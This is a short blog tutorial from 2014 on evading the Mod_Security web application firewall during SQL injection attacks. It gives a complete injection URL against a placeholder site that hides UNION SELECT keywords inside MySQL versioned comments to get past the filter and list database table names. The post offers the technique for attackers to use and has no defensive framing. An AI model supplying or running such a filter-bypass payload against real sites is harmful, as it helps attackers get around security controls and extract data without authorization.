[TUTORIAL] Mod_Security bypass (SQLi)
Wednesday, February 26, 2014
Today i will show you how to bypass Mod_Security WAF for SQLi attack.
Probably, most of you did querie UNION SELECT 1,2,3,4... etc and saw message like "Not Acceptable!"
Take a look at following picture:
![[IMG]](http://i.imgur.com/LJCfl5M.jpg)
This message is generated by WAF called Mod_Security and here is solution how you can bypass this WAF:
Code:
http://www.vulnsite.com/index.php?id=-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
Megaxem Cinema - Xem thả ga
![Adf.ly Killer Code [Tutorial]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq5aQcqLaWdmdG7Wwx7ZDxU7d5GdSoabWZf_X3MFgSuJjk1pKnQGwfnaRy7nF8sOiVMiBja-G7DlqoYyskZpCec1pBbqeQMvyW7bV6UV8Zo5slf8oLTuhJBecfTE_tibx1upsSL8t3Jr4/s72-c/tut1.png)
All comments [ 0 ]
Your comments